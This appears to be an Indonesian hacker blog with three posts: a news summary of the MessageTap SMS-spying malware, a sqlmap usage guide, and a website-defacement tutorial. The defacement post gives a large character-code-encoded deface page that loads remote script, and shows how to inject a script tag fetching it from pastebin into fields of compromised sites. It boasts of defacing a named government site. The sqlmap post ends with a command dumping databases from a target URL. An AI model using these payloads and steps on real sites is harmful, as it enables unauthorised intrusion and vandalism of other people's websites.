Peretas Cina Mengompromikan Server Telekomunikasi untuk Memata-matai Pesan SMS





sms malware
Sekelompok peretas atau hacker di cina yang melakukan spionase politik unutuk beijing
telah ditemukan menargetkan perusahaan telekomunikasi dengan malware baru yang dirancang sendiri
oleh sang hacker untuk memata-matai pesan teks yang dikirim atau diterima individu yang
sangat ditargetkan.
waduh bahaya banget nih jika jenis malware ini tersebar di indonesia

kelompok ini dijuluki "MassageTap", Malware backdoor adalah penambang data ELF 64-bit
yang baru-baru ini ditemukan diinstall pada server Short Massage Service Center(SMSC)
berbasis Linux dari perusahaan telekomunikasi yang tidak disebutkan namanya.

menurut sebuah laporan yang saya lihat baru baru ini yang diterbitkan oleh firma Mandiant
dari FireEye, MassageTap telah dibuat dan digunakan oleh APT41, sebuah kelompok hacker atau peretas
cina yang produktif yang melakukan operasi spionase yang disponsori negara dan juga telah
ditemukan terlibat dalam serangan bermotivasi finansial.

Dalam jaringan telepon seluler, server SMSC bertindak sebagai layanan perantara yang bertanggung jawab
untuk menangani operasi SMS dengan merutekan pesan antara pengirim dan penerima.

Karena SMS tidak dirancang untuk dienkripsi, baik pada transmisi maupun pada server telekomunikasi,
kompromi sistem SMSC memungkinkan penyerang untuk memonitor semua koneksi jaringan ke dan dari server data
di dalamnya

Oke gimana sih cara kerja malware jenis ini (MALWARE MASSAGETAP)


MassegeTap menggunakan perpustakaan libpvap untuk memantau semua lalu lintas SMS dan kemudian
mem-parsing konten setiap pesan untuk menentukan IMSI dan nomor telepon pengirim dan penerima.
messagetap chinese malware
Menurut para peneliti, hacker ini telah merancang malware MassageTap untuk difilter dan hanya menyimpan pesan:
  • dikirim atau diterima oleh nomor telepon tertentu
  • mengandung kata kunci tertentu, atau
  • dengan nomor IMSI tertentu.
Untuk ini, MassageTap bergantung pada dua file konfigurasi yang disediakan oleh penyerang
- keyword_parm.txt dan parm.txt - yang berisi daftar nomor telepon yang ditargetkan, nomor IMSI, dan kata kunci
yang ditautkan ke "orang-orang penting yang tertarik pada layanan inteljen cina."


"Kedua file dihapus dari disk setelah file konfigurasi dibaca dan dimuat ke dalam memori. Setelah memuat kata kunci dan file data ponsel, MESSAGETAP mulai memantau semua koneksi jaringan ke dan dari server," kata para peneliti dalam laporannya yang dirilis hari ini.

"Data dalam keyword_parm.txt berisi persyaratan minat geopolitik terhadap pengumpulan intelijen Cina."

Jika ia menemukan teks pesan SMS yang menarik, malware XOR kontennya dan menyimpannya ke file CSV untuk kemudian dicuri oleh aktor ancaman.

Menurut para peneliti, "risiko data yang tidak terenkripsi dicegat beberapa lapisan di hulu dalam rantai komunikasi seluler mereka" sangat "penting bagi individu yang sangat ditargetkan seperti pembangkang, jurnalis, dan pejabat yang menangani informasi yang sangat sensitif."

Selain itu, kelompok peretasan APT41 juga ditemukan mencuri catatan perincian panggilan (CDR) terkait dengan orang asing berpangkat tinggi selama intrusi yang sama ini, mengekspos metadata panggilan, termasuk waktu panggilan, durasi mereka, dan sumber serta tujuan nomor telepon.

Peretas Cina yang menargetkan perusahaan telekomunikasi bukanlah hal baru. Pada tahun ini sendiri, kelompok peretasan APT41 menargetkan setidaknya empat entitas telekomunikasi, dan kelompok-kelompok yang disponsori negara China yang dicurigai juga diamati mengenai empat organisasi telekomunikasi tambahan.

Menurut para peneliti FireEye, tren ini akan terus berlanjut dan semakin banyak kampanye yang akan segera ditemukan, dan oleh karena itu untuk mengurangi tingkat risiko, organisasi yang ditargetkan harus mempertimbangkan untuk menggunakan program komunikasi yang sesuai yang memberlakukan enkripsi ujung-ke-ujung.
 
 
 
 
 

SQLMAP - Alat Injeksi otomatis dan pengambilan basis data


SQLMAP - SQL Injections yang mampu mengambil basis data secara otomatis sama serperti Havij sqlmap hadir unutk linux dan pengguna termux

jika kalean tidak tau apa itu sqlmap maka saya akan memberitahukan aoa itu sqlmap
SQLMAP adalah alat pengujuan atau penetrasi sumber terbuka yang mengotomatiskan proses
mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database
semua bisa dilakukan dengan mesin deteksi yang sangat kuat, dan banyak fitur niche unutk
tester penetrasi utama dan berbagi switch yang berlangsung dari sidik jari basis data,
dan pengambilan data dari basis data, untuk mengakses sistem file yang mendasari dan
menjalankan perintah pada sistem operasi out-koneksi-band.

wah pokoknya ini tools mantep deh nih gua kasih tau fitur fiturnya
  • Dukungan penuh untuk MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB, dan sistem manajemen basis data H2.
  • Dukungan penuh untuk enam teknik injeksi SQL: boolean-based blind, time-based blind, berbasis-kesalahan, UNION-based query, stacked queries dan out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Dukungan untuk menghitung pengguna, hash kata sandi, hak istimewa, peran, basis data, tabel dan kolom.
     
  • Pengenalan otomatis format hash kata sandi dan dukungan untuk memecahkannya menggunakan serangan berbasis kamus.
  • Dukungan untuk membuang tabel database seluruhnya, berbagai entri atau kolom tertentu sesuai pilihan pengguna. Pengguna juga dapat memilih untuk membuang hanya serangkaian karakter dari setiap entri kolom.
  • Dukungan untuk mencari nama database tertentu, tabel spesifik di semua basis data atau kolom spesifik di seluruh tabel semua basis data. Ini berguna, misalnya, untuk mengidentifikasi tabel yang berisi kredensial aplikasi khusus tempat nama kolom yang relevan berisi string seperti nama dan pass.
  • Dukungan untuk mengunduh dan mengunggah file apa pun dari server database yang mendasari sistem file ketika perangkat lunak database adalah MySQL, PostgreSQL atau Microsoft SQL Server.
  • Dukungan untuk mengeksekusi perintah sewenang-wenang dan mengambil output standar mereka pada server database yang mendasari sistem operasi ketika perangkat lunak database adalah MySQL, PostgreSQL atau Microsoft SQL Server.
     
  • Dukungan untuk membangun koneksi TCP state-out-of-band antara mesin penyerang dan server database yang mendasari sistem operasi. Saluran ini dapat berupa prompt perintah interaktif, sesi Meterpreter, atau sesi antarmuka pengguna grafis (VNC) sesuai pilihan pengguna.
     
  • Dukungan untuk eskalasi hak istimewa pengguna proses database melalui perintah Metproteit meterpreter getsystem perintah.
 Dikutip dari http://sqlmap.org/

Cara Penginstallannya sangat mudah
root@darkclownsec~:# git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

atau bisa juga seperti ini 
root@darkclownsec~:# git clone https://github.com/sqlmapproject/sqlmap.git

sqlmap support python jika blm install maka install lah

cara pemakaiannya 
jika ingin melihat opsi maka tulislah commnad sepert ini

python sqlmap.py -h


 contoh cara menggunakannya
root@darkclownsec~:# cd sqlmap
root@darkclownsec~:# python sqlmap.py -u https://www.target.co.li/index.php?id=500 --dbs
nah seperti itu maka ia otomatis akan mengeluarkan isi dari databasenya
oke sekian dari saya cuma segitu materi dari sqlmap yang saya berikan semoga bermanfaat
bye
 

Deface PoC dengan JS Overlay (JSO)

Tutorial Deface untuk para defacer defacer :3
oke kali ini gua bakal share ke kalian gimana sih cara deface PoC JSO (Java Script Overlay), teknik ini berguna banget jika kalian sudah mem bypassing admin login, NoRedirect, SQL injection, atau apalah poc nya :v
tetapi pas udah masuk ke admin/dashboardnya tidak menemukan tempat upload shell atau gak support php walapun udah di tamper data :( aduh sedih kan udah cape cape seneng seneng tapi gak bisa upload shell, oke tenang sebenernya gak jadi masalah, teknik inilah yang bisa menangani semua masalah :3
ya teknik ini pernah di gunakan oleh defacer terkenal dengan mendeface web 1CAK, Babymetal

jika belum mempunyai script jso nya silahkan kunjungi web ini
Convert JSO
 
nah disini kalian bakalan di arahkan
nah OPSI masukan script deface my disini budjank silahkan masukan script deface mu disitu dan langsung convert nanti bakalan berubah jadi bilangan hex contoh seperti ini

60, 104, 116, 109, 108, 62, 10, 60, 116, 105, 116, 108, 101, 62, 91, 45, 68, 97, 114, 107, 32, 67, 108, 111, 119, 110, 32, 83, 101, 99, 117, 114, 105, 116, 121, 45, 93, 60, 47, 116, 105, 116, 108, 101, 62, 10, 60, 109, 101, 116, 97, 32, 99, 104, 97, 114, 115, 101, 116, 61, 34, 117, 116, 102, 45, 56, 34, 62, 10, 60, 109, 101, 116, 97, 32, 112, 114, 111, 112, 101, 114, 116, 121, 61, 34, 111, 103, 58, 105, 109, 97, 103, 101, 34, 32, 99, 111, 110, 116, 101, 110, 116, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 49, 46, 98, 112, 46, 98, 108, 111, 103, 115, 112, 111, 116, 46, 99, 111, 109, 47, 45, 119, 54, 114, 115, 113, 83, 83, 75, 88, 52, 69, 47, 88, 86, 69, 56, 56, 122, 95, 115, 66, 86, 73, 47, 65, 65, 65, 65, 65, 65, 65, 65, 69, 72, 111, 47, 103, 72, 98, 68, 105, 87, 69, 57, 56, 119, 69, 109, 102, 104, 109, 52, 119, 117, 103, 85, 95, 45, 70, 95, 86, 90, 111, 111, 103, 86, 52, 83, 65, 67, 69, 119, 89, 66, 104, 103, 76, 47, 115, 51, 50, 48, 47, 100, 102, 101, 50, 49, 56, 50, 57, 45, 102, 48, 54, 97, 45, 52, 101, 98, 100, 45, 56, 57, 56, 49, 45, 100, 55, 55, 55, 56, 50, 98, 100, 49, 54, 49, 52, 46, 106, 112, 103, 34, 32, 47, 62, 10, 60, 109, 101, 116, 97, 32, 112, 114, 111, 112, 101, 114, 116, 121, 61, 34, 111, 103, 58, 116, 105, 116, 108, 101, 34, 32, 99, 111, 110, 116, 101, 110, 116, 61, 34, 68, 101, 119, 97, 110, 32, 80, 101, 110, 105, 110, 100, 97, 115, 97, 110, 32, 82, 97, 107, 121, 97, 116, 34, 32, 47, 62, 10, 60, 109, 101, 116, 97, 32, 112, 114, 111, 112, 101, 114, 116, 121, 61, 34, 111, 103, 58, 100, 101, 115, 99, 114, 105, 112, 116, 105, 111, 110, 34, 32, 99, 111, 110, 116, 101, 110, 116, 61, 34, 75, 79, 82, 85, 80, 84, 79, 82, 32, 75, 79, 82, 85, 80, 84, 79, 82, 32, 66, 65, 78, 71, 83, 65, 84, 34, 47, 62, 10, 60, 109, 101, 116, 97, 32, 110, 97, 109, 101, 61, 34, 116, 104, 101, 109, 101, 45, 99, 111, 108, 111, 114, 34, 32, 99, 111, 110, 116, 101, 110, 116, 61, 34, 35, 48, 48, 48, 48, 48, 48, 34, 62, 10, 60, 108, 105, 110, 107, 32, 114, 101, 108, 61, 34, 105, 99, 111, 110, 34, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 49, 46, 98, 112, 46, 98, 108, 111, 103, 115, 112, 111, 116, 46, 99, 111, 109, 47, 45, 119, 54, 114, 115, 113, 83, 83, 75, 88, 52, 69, 47, 88, 86, 69, 56, 56, 122, 95, 115, 66, 86, 73, 47, 65, 65, 65, 65, 65, 65, 65, 65, 69, 72, 111, 47, 103, 72, 98, 68, 105, 87, 69, 57, 56, 119, 69, 109, 102, 104, 109, 52, 119, 117, 103, 85, 95, 45, 70, 95, 86, 90, 111, 111, 103, 86, 52, 83, 65, 67, 69, 119, 89, 66, 104, 103, 76, 47, 115, 51, 50, 48, 47, 100, 102, 101, 50, 49, 56, 50, 57, 45, 102, 48, 54, 97, 45, 52, 101, 98, 100, 45, 56, 57, 56, 49, 45, 100, 55, 55, 55, 56, 50, 98, 100, 49, 54, 49, 52, 46, 106, 112, 103, 34, 32, 115, 105, 122, 101, 115, 61, 34, 51, 50, 120, 51, 50, 34, 32, 47, 62, 10, 60, 47, 115, 116, 121, 108, 101, 62, 10, 60, 104, 101, 97, 100, 62, 10, 9, 32, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 114, 97, 119, 103, 105, 116, 46, 99, 111, 109, 47, 98, 117, 110, 103, 102, 114, 97, 110, 103, 107, 105, 47, 101, 102, 101, 107, 115, 97, 108, 106, 117, 47, 50, 97, 55, 56, 48, 53, 99, 55, 47, 100, 97, 117, 110, 45, 98, 101, 114, 103, 117, 103, 117, 114, 97, 110, 46, 106, 115, 34, 32, 116, 121, 112, 101, 61, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 10, 60, 47, 104, 101, 97, 100, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 49, 53, 34, 62, 91, 45, 45, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 77, 114, 46, 84, 101, 110, 65, 114, 45, 45, 93, 60, 47, 102, 111, 110, 116, 62, 60, 47, 99, 101, 110, 116, 101, 114, 62, 10, 60, 109, 97, 114, 113, 117, 101, 101, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 49, 48, 34, 62, 68, 97, 114, 107, 32, 67, 108, 111, 119, 110, 32, 83, 101, 99, 117, 114, 105, 116, 121, 60, 47, 102, 111, 110, 116, 62, 60, 47, 109, 97, 114, 113, 117, 101, 101, 62, 10, 60, 115, 116, 121, 108, 101, 32, 114, 101, 108, 61, 34, 115, 116, 121, 108, 101, 115, 104, 101, 101, 116, 34, 32, 116, 121, 112, 101, 61, 34, 116, 101, 120, 116, 47, 99, 115, 115, 34, 62, 10, 9, 98, 111, 100, 121, 32, 123, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 58, 32, 98, 108, 97, 99, 107, 59, 10, 9, 125, 10, 9, 9, 109, 97, 114, 103, 105, 110, 58, 32, 48, 59, 10, 9, 125, 10, 9, 46, 115, 108, 105, 100, 101, 32, 123, 10, 9, 9, 109, 97, 120, 45, 119, 105, 100, 116, 104, 58, 32, 97, 117, 116, 111, 59, 10, 9, 9, 104, 101, 105, 103, 104, 116, 58, 32, 54, 57, 48, 112, 120, 59, 10, 9, 9, 112, 111, 115, 105, 116, 105, 111, 110, 58, 32, 114, 101, 108, 97, 116, 105, 118, 101, 59, 10, 9, 125, 10, 9, 46, 115, 108, 105, 100, 101, 49, 44, 46, 115, 108, 105, 100, 101, 50, 44, 46, 115, 108, 105, 100, 101, 51, 32, 123, 10, 9, 9, 112, 111, 115, 105, 116, 105, 111, 110, 58, 32, 97, 98, 115, 111, 108, 117, 116, 101, 59, 10, 9, 9, 119, 105, 100, 116, 104, 58, 32, 49, 48, 48, 37, 59, 10, 9, 9, 104, 101, 105, 103, 104, 116, 58, 32, 49, 48, 48, 37, 59, 10, 9, 125, 10, 9, 46, 115, 108, 105, 100, 101, 49, 32, 123, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 58, 32, 117, 114, 108, 40, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 105, 107, 46, 116, 101, 109, 112, 111, 46, 99, 111, 47, 100, 97, 116, 97, 47, 50, 48, 49, 57, 47, 48, 57, 47, 50, 52, 47, 105, 100, 95, 56, 55, 53, 49, 52, 50, 47, 56, 55, 53, 49, 52, 50, 95, 55, 50, 48, 46, 106, 112, 103, 41, 32, 110, 111, 45, 114, 101, 112, 101, 97, 116, 32, 99, 101, 110, 116, 101, 114, 59, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 45, 115, 105, 122, 101, 58, 32, 53, 48, 48, 112, 120, 59, 10, 9, 9, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 9, 45, 119, 101, 98, 107, 105, 116, 45, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 49, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 125, 10, 9, 46, 115, 108, 105, 100, 101, 50, 32, 123, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 58, 32, 117, 114, 108, 40, 104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 107, 97, 110, 105, 103, 111, 114, 111, 46, 99, 111, 109, 47, 119, 112, 45, 99, 111, 110, 116, 101, 110, 116, 47, 117, 112, 108, 111, 97, 100, 115, 47, 50, 48, 49, 55, 47, 48, 57, 47, 112, 98, 115, 95, 116, 119, 105, 109, 103, 95, 99, 111, 109, 95, 109, 101, 100, 105, 97, 95, 68, 75, 69, 74, 69, 76, 113, 86, 65, 65, 65, 112, 46, 106, 112, 103, 41, 32, 110, 111, 45, 114, 101, 112, 101, 97, 116, 32, 99, 101, 110, 116, 101, 114, 59, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 45, 115, 105, 122, 101, 58, 32, 53, 48, 48, 112, 120, 59, 10, 9, 9, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 9, 45, 119, 101, 98, 107, 105, 116, 45, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 50, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 125, 10, 9, 46, 115, 108, 105, 100, 101, 51, 32, 123, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 58, 32, 117, 114, 108, 40, 104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 50, 46, 116, 115, 116, 97, 116, 105, 99, 46, 110, 101, 116, 47, 115, 117, 109, 115, 101, 108, 47, 102, 111, 116, 111, 47, 98, 97, 110, 107, 47, 105, 109, 97, 103, 101, 115, 47, 109, 97, 117, 100, 105, 112, 101, 108, 117, 107, 46, 106, 112, 103, 41, 32, 110, 111, 45, 114, 101, 112, 101, 97, 116, 32, 99, 101, 110, 116, 101, 114, 59, 10, 9, 9, 98, 97, 99, 107, 103, 114, 111, 117, 110, 100, 45, 115, 105, 122, 101, 58, 32, 53, 48, 48, 112, 120, 59, 10, 9, 9, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 9, 45, 119, 101, 98, 107, 105, 116, 45, 97, 110, 105, 109, 97, 116, 105, 111, 110, 58, 32, 102, 97, 100, 101, 51, 32, 56, 115, 32, 105, 110, 102, 105, 110, 105, 116, 101, 59, 10, 9, 125, 10, 9, 64, 107, 101, 121, 102, 114, 97, 109, 101, 115, 32, 102, 97, 100, 101, 32, 123, 10, 9, 9, 48, 37, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 49, 125, 10, 9, 9, 51, 51, 46, 51, 51, 51, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 54, 54, 46, 54, 54, 54, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 49, 48, 48, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 49, 125, 10, 9, 125, 10, 9, 64, 107, 101, 121, 102, 114, 97, 109, 101, 115, 32, 102, 97, 100, 101, 50, 32, 123, 10, 9, 9, 48, 37, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 51, 51, 46, 51, 51, 51, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 49, 125, 10, 9, 9, 54, 54, 46, 54, 54, 54, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 49, 48, 48, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 125, 10, 9, 64, 107, 101, 121, 102, 114, 97, 109, 101, 115, 32, 102, 97, 100, 101, 51, 32, 123, 10, 9, 9, 48, 37, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 51, 51, 46, 51, 51, 51, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 9, 54, 54, 46, 54, 54, 54, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 49, 125, 10, 9, 9, 49, 48, 48, 37, 32, 123, 111, 112, 97, 99, 105, 116, 121, 58, 32, 48, 125, 10, 9, 125, 10, 60, 47, 115, 116, 121, 108, 101, 62, 10, 32, 32, 60, 105, 102, 114, 97, 109, 101, 32, 119, 105, 100, 108, 108, 116, 104, 61, 34, 48, 37, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 48, 34, 32, 115, 99, 114, 111, 108, 108, 105, 110, 103, 61, 34, 110, 111, 34, 32, 102, 114, 97, 109, 101, 98, 111, 114, 100, 101, 114, 61, 34, 110, 111, 34, 32, 108, 111, 111, 112, 61, 34, 116, 114, 117, 101, 34, 32, 97, 108, 108, 111, 119, 61, 34, 97, 117, 116, 111, 112, 108, 97, 121, 34, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 51, 46, 116, 111, 112, 52, 116, 111, 112, 46, 110, 101, 116, 47, 109, 95, 49, 51, 54, 51, 57, 121, 122, 54, 120, 49, 46, 109, 112, 51, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 60, 47, 115, 112, 97, 110, 62, 32, 10, 60, 98, 111, 100, 121, 62, 10, 9, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 34, 115, 108, 105, 100, 101, 34, 62, 10, 9, 9, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 34, 115, 108, 105, 100, 101, 49, 34, 62, 60, 47, 100, 105, 118, 62, 10, 9, 9, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 34, 115, 108, 105, 100, 101, 50, 34, 62, 60, 47, 100, 105, 118, 62, 10, 9, 9, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 34, 115, 108, 105, 100, 101, 51, 34, 62, 60, 47, 100, 105, 118, 62, 10, 10, 9, 60, 47, 100, 105, 118, 62, 10, 60, 47, 98, 111, 100, 121, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 66, 85, 78, 71, 32, 65, 80, 65, 75, 65, 72, 32, 75, 65, 85, 32, 83, 85, 68, 65, 72, 32, 84, 69, 78, 65, 78, 71, 32, 68, 73, 32, 65, 76, 65, 77, 32, 83, 65, 78, 65, 63, 60, 47, 102, 111, 110, 116, 62, 10, 60, 98, 114, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 66, 65, 78, 71, 85, 76, 65, 72, 32, 83, 69, 66, 69, 78, 84, 65, 82, 32, 83, 65, 74, 65, 32, 76, 73, 72, 65, 84, 32, 78, 69, 71, 65, 82, 65, 32, 73, 78, 73, 60, 47, 102, 111, 110, 116, 62, 10, 60, 98, 114, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 68, 65, 72, 85, 76, 85, 32, 75, 65, 85, 32, 83, 65, 78, 71, 65, 84, 32, 84, 65, 75, 32, 73, 78, 71, 73, 78, 32, 84, 69, 82, 74, 65, 68, 73, 32, 80, 69, 82, 65, 78, 71, 32, 83, 65, 85, 68, 65, 82, 65, 33, 60, 47, 102, 111, 110, 116, 62, 10, 60, 98, 114, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 78, 65, 77, 85, 78, 32, 76, 73, 72, 65, 84, 32, 76, 65, 72, 32, 83, 69, 75, 65, 82, 65, 78, 71, 32, 66, 85, 78, 71, 60, 47, 102, 111, 110, 116, 62, 10, 60, 98, 114, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 83, 69, 77, 85, 65, 32, 89, 65, 78, 71, 32, 75, 65, 85, 32, 84, 65, 75, 85, 84, 73, 32, 73, 84, 85, 32, 84, 69, 82, 74, 65, 68, 73, 32, 83, 69, 75, 65, 82, 65, 78, 71, 46, 46, 60, 47, 102, 111, 110, 116, 62, 10, 60, 98, 114, 62, 10, 60, 99, 101, 110, 116, 101, 114, 62, 60, 102, 111, 110, 116, 32, 99, 111, 108, 111, 114, 61, 34, 119, 104, 105, 116, 101, 34, 32, 102, 97, 99, 101, 61, 34, 77, 111, 110, 111, 115, 112, 97, 99, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 34, 62, 83, 65, 85, 68, 65, 82, 65, 75, 85, 32, 83, 65, 76, 73, 78, 71, 32, 77, 69, 77, 69, 82, 65, 78, 71, 73, 32, 83, 65, 85, 68, 65, 82, 65, 32, 89, 65, 78, 71, 32, 76, 65, 73, 78, 78, 89, 65, 32, 58, 45, 40, 60, 47, 102, 111, 110, 116, 62, 10, 60, 47, 104, 116, 109, 108, 62
Nah Jika sudah silahkan tambahkan
document.documentElement.innerHTML=String.fromCharCode(nah hasil convert tadi pasukin di tanda kurung ini)
sesudah itu gasken new post broo
jika sudah ke post kalian coba masuk ke menu RAW dan salin url contoh script jso nya jadi
nanti kalian ganti yang https://pastebin.com/raw/blabala jadi url deface anda di pastebin
<script type="text/javascript" src="https://pastebin.com/raw/7ZHrkWGJ"></script> 
jika sudah silahkan deh kalian masukin script kalian di kolam kolam seperti post dan apala
contoh :
 nah masukan script JSO di kolam keterangan
dannnnnnnn BOOMMMMMM HASILNYA!!!!!!.
http://sipbos.ambon.go.id/


demo web yang saya deface pakai poc ini
poc ini bisa digunakan di semua cms seperti joomla, wordpress, lokomedia dll
ya walapun ada kekuarangannya ya gabisa tanem shell :(
done deh, oke mudah bukan? :) oke sekian tunggu updatean ku kedepannya bye.
SILAHKAN LIHAT VIDEO TUTORIALNYA :)